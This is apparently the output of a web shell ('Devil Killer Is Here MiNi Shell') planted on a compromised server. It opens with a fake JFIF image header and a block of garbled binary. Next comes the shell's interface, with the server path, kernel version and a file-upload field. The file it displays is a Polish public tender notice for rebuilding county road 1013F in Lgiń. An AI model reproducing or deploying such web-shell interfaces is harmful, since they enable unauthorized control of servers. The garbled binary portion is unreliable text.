JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230331/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230331/0015994601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa i rozbudowa drogi powiatowej nr 1013F w Lginiu – Etap II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wschowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 977945847</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Kosynierów 1c</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wschowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@powiat.wschowa.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://wschowa.info/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa i rozbudowa drogi powiatowej nr 1013F w Lginiu – Etap II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d06c1e1a-cf90-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00159946</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00028245/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Przebudowa i rozbudowa drogi powiatowej nr 1013F w Lginiu - etap II</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatwschowa.ezamawiajacy.pl/pn/powiatwschowa/demand/107603/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiatwschowa.ezamawiajacy.pl/pn/powiatwschowa/demand/107603/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji<br/>elektronicznej.2.Sposób komunikacji oraz wymagania formalne i techniczne dotyczące składania oświadczeń i dokumentów: a) w<br/>postępowaniu komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się<br/>przy użyciu Platformy. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania<br/>na Platformie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wszelka korespondencja będzie<br/>kierowana do pełnomocnika. b) Zamawiający może komunikować się (z wyłączeniem składania ofert oraz oświadczeń) z<br/>Wykonawcami również za pomocą poczty elektronicznej (jurek.beata80@gmail.com). 3. Sposób sporządzenia dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. 4. Zamawiający określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512kb/s, b) komputer klasy PC lub MAC o konfiguracji co najmniej: pamięć min 2GB RAM, procesor 2GHZ, jeden z<br/>systemów operacyjnych, np. MS Windows 7 lub nowszy, Mac Os x 10.4, lub nowszy lub kompatybilny system z rodziny Linux, c)<br/>zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2 np. Internet Explorer minimalnie wersja 10.0,d) włączona<br/>obsługa JavaScript, e) zainstalowany program do odczytu plików typu .pdf np. Acrobat Reader.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: administratorem Pani/Pana danych osobowych jest Powiat Wschowski, 67-<br/>400 Wschowa, ul. Pl. Kosynierów 1c, tel. 065/540-48-00; inspektorem ochrony danych osobowych u Zamawiającego jest Tomasz<br/>Wadas tel. 570 170 137, adres e-mail: iod@powiat.wschowa.com.pl, Pani/Pana dane osobowe przetwarzane będą na podstawie art.<br/>6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego OSE.272.4.2023 prowadzonym w<br/>trybie podstawowym zgodnie z art. 275. ust. 2 ustawy; odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 78 ustawy Prawo zamówień publicznych, dalej<br/>„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres co najmniej 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli zobowiązania wskazane w ofercie i umowie przekroczą w/w przedział<br/>czasowy, okres przechowywania obejmuje ten termin; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; posiada<br/>Pani/Pan: − na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych **; − na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; − prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych<br/>Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: − w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do<br/>usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; − na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. W trakcie<br/>oraz po zakończeniu postępowania o udzielenie zamówienia publicznego, w przypadku gdy wykonanie obowiązków, o których mowa<br/>w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby,<br/>której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSE.272.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot niniejszego zamówienia obejmuje realizację inwestycji w formule „zaprojektuj i wybuduj” polegającej na<br/>przebudowie istniejącej drogi powiatowej nr 1013F w miejscowości Lgiń, gmina Wschowa, na odcinku od km 0+865,97 do<br/>km 1+425,40 - ETAP 2. Podstawowe parametry elementów przeznaczonych do przebudowy odcinka drogi w km od<br/>0+865,97 do km 1+425,40 - ETAP 2: a) klasa drogi - L, b) szerokość jezdni – 5,5 m, c) szerokość poboczy utwardzonych<br/>0,75 -1,5 m, d) nawierzchnia jezdni, poboczy i zjazdów bitumiczna. 2) Zakres inwestycji na przedmiotowym odcinku drogi<br/>obejmować będzie: a) wymianę istniejącej nawierzchni jezdni na nową z masy asfaltowej, b) wykonanie nowej konstrukcji<br/>jezdni w przypadku, kiedy na jakimś odcinku drogi stwierdzone zostanie, na podstawie badań geotechnicznych,<br/>występowanie gruntów nienośnych, c) przebudowę z rozbudową istniejących skrzyżowań z drogami gminnymi, d)<br/>przebudowę, rozbudowę lub budowę zjazdów na drogi wewnętrzne, e) przebudowę, rozbudowę lub budowę zjazdów<br/>publicznych i zjazdów indywidualnych, f) budowę poboczy, g) rozbiórkę istniejących i budowę nowych przepustów pod<br/>drogą, h) przebudowę, rozbudowę lub budowę nowej kanalizacji deszczowej, i) budowę progów zwalniających, j) budowę<br/>urządzeń bezpieczeństwa ruchu drogowego (stała organizacja ruchu), k) budowę kanału technologicznego, l) przebudowę<br/>istniejącej infrastruktury technicznej kolidującej z przebudowywaną drogą, w tym sieci i przyłączy elektroenergetycznych,<br/>wodociągowych, kanalizacyjnych i telekomunikacyjnych, m) wycinkę drzew i krzewów kolidujących z inwestycją, n)<br/>humusowanie i obsianie trawą terenów i pasów zieleni, o) wszelkie inne roboty jakie okażą się niezbędne dla wykonania<br/>przedmiotu zamówienia. Szczegółowy zakres przedsięwzięcia zawiera Program funkcjonalno – użytkowy stanowiący<br/>załącznik nr 1 do SWZ. Przedmiotowe zamówienia podzielono na dwa zadania: Zadanie I - sporządzenie pełnobranżowej<br/>dokumentacji projektowej w oparciu o Program funkcjonalno – użytkowy stanowiący załącznik nr 1 do SWZ.<br/>Zadanie II – wykonanie robót budowlanych, zgodnie z projektem budowlanym, specyfikacjami technicznymi wykonania i<br/>odbioru robót budowlanych, zasadami wiedzy technicznej i sztuki budowlanej oraz zasadami i warunkami bhp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233161-5 - Roboty budowlane w zakresie ścieżek pieszych</p> <p class="mb-0">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria: Cena brutto” i<br/>„Gwarancja”. Ocena ofert zostanie dokonana wg następującej zasady: kryterium „Cena brutto” (C) o wadze 60 % W ramach tego<br/>kryterium wykonawca może uzyskać maksymalnie 60 pkt. Ocena punktowa dokonana zostanie zgodnie z formułą: C = (cena brutto<br/>najtańszej oferty)/(cena brutto oferty badanej) x 60 pkt. Kryterium „Gwarancja” (G) o wadze 40 %. W ramach tego kryterium<br/>wykonawca może uzyskać maksymalnie 40 pkt. Ocena punktowa dokonana zostanie zgodnie z formułą: Zaoferowany okres<br/>gwarancji: 36 miesięcy-0 pkt; Powyżej 36 miesięcy do 42<br/>miesięcy-10 pkt; Powyżej 42 miesięcy do 48 miesięcy-20 pkt Powyżej 48 miesięcy do 54 miesięcy-30 pkt; Powyżej 54 miesięcy do<br/>84 miesięcy-40 pkt. Okres gwarancji należy podawać<br/>wyłącznie w pełnych miesiącach. Najdłuższy możliwy termin udzielenia gwarancji: 84 miesięcy. Najkrótszy możliwy terminy<br/>udzielenia gwarancji: 36 miesięcy – 0 punktów. Zamawiający pod pojęciem gwarancji rozumie również gwarancję z tytułu rękojmi za<br/>wady. Wykonawca, który zaoferuje okres udzielonej gwarancji większy niż 84 miesiące – otrzyma 40 pkt, a do umowy zostanie<br/>przyjęty zadeklarowany okres gwarancji. Jeśli Wykonawca nie poda okresu gwarancji Zamawiający uzna, że oferuje minimalny<br/>termin gwarancji i przyzna Wykonawcy w tym kryterium 0 pkt. Jeśli Wykonawca zaproponuje w formularzu oferty okres udzielonej<br/>gwarancji krótszy niż 36 miesięcy lub zadeklaruje okres równy 0 (zero) a z innych dokumentów nie będzie wynikało, że nastąpiła<br/>omyłka, oferta zostanie odrzucona, zgodnie z art. 226 ust. 1 pkt 5) ustawy Pzp. Za najkorzystniejszą zostanie wybrana oferta, która<br/>zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą sumę punktów C + G spośród ofert nie podlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy zobowiązani są spełniać warunki dotyczące: 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia żadnego warunku w tym zakresie 2) uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów Zamawiający nie stawia żadnego warunku w tym<br/>zakresie 3) sytuacji ekonomicznej lub finansowej Zamawiający nie stawia żadnego warunku w tym zakresie 4) zdolności<br/>technicznej lub zawodowej: Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: a) zrealizował w ciągu<br/>ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>minimum 2 (dwie) roboty polegające na budowie/przebudowie drogi publicznej o nawierzchni bitumicznej o wartości<br/>każdego zamówienia nie mniejszej niż 200 000,00 zł brutto; b) w zakresie doświadczenia projektanta: w ciągu ostatnich 3 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał<br/>minimum 1 zadanie porównywalne z przedmiotem zamówienia tj. opracował dokumentację projektową, polegającą na<br/>budowie/przebudowie drogi o długości minimum 0,4 km, obejmującą projekt wielobranżowy (branże wod-kan, elektryczną,<br/>telekomunikacyjna i drogową) i wartości zamówienia nie mniejszej niż 25 000,00 zł brutto poparte dokumentami (dowodami)<br/>potwierdzającymi, że opracowanie zostało wykonane w sposób należyty zgodnie z zasadami sztuki budowlanej i prawidłowo<br/>ukończone (np. referencje, poświadczenie), c) dysponuje co najmniej jedną osobą (kierownikiem budowy) posiadającą<br/>uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń . Kierownik budowy musi<br/>przynależeć do Izby Inżynierów Budownictwa w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia<br/>29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w Konfederacji Szwajcarskiej muszą oni spełniać wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że<br/>samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 tejże ustawy, mogą również wykonywać osoby,<br/>których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach ustawy z dnia 22<br/>grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j.<br/>Dz.U.2021 r. poz. 1646, ze zm.), d) dysponuje osobami, które pełnić będą funkcje kierowników robót, posiadającymi<br/>uprawnienia do kierowania robotami budowlanymi w specjalności: - instalacyjnej w zakresie sieci, instalacji i urządzeń wod.-<br/>kan. bez ograniczeń, - instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń,- instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń. Każda z osób<br/>wskazanych do pełnienia funkcji kierowników robót winna okazać się przynależnością do Izby Inżynierów Budownictwa w<br/>rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania<br/>zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz. 831). W<br/>przypadku obywateli państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej muszą oni spełniać<br/>wymogi określone w art. 12a ustawy Prawo budowlane, z których wynika, że samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 tejże ustawy, mogą również wykonywać osoby, których odpowiednie kwalifikacje<br/>zawodowe zostały uznane na zasadach określonych w przepisach ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U.2021 r. poz. 1646, ze zm.), e)<br/>dysponuje osobami posiadającymi uprawnienia budowlane do projektowania w specjalności: - inżynieryjnej drogowej bez<br/>ograniczeń, - instalacyjnej w zakresie sieci, instalacji i urządzeń wod.-kan. bez ograniczeń, - instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, - instalacyjnej w zakresie sieci, instalacji i<br/>urządzeń telekomunikacyjnych bez ograniczeń. Każdy z projektantów winien okazać się przynależnością do Izby Inżynierów<br/>Budownictwa w rozumieniu przepisów Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r. poz.<br/>831). W przypadku 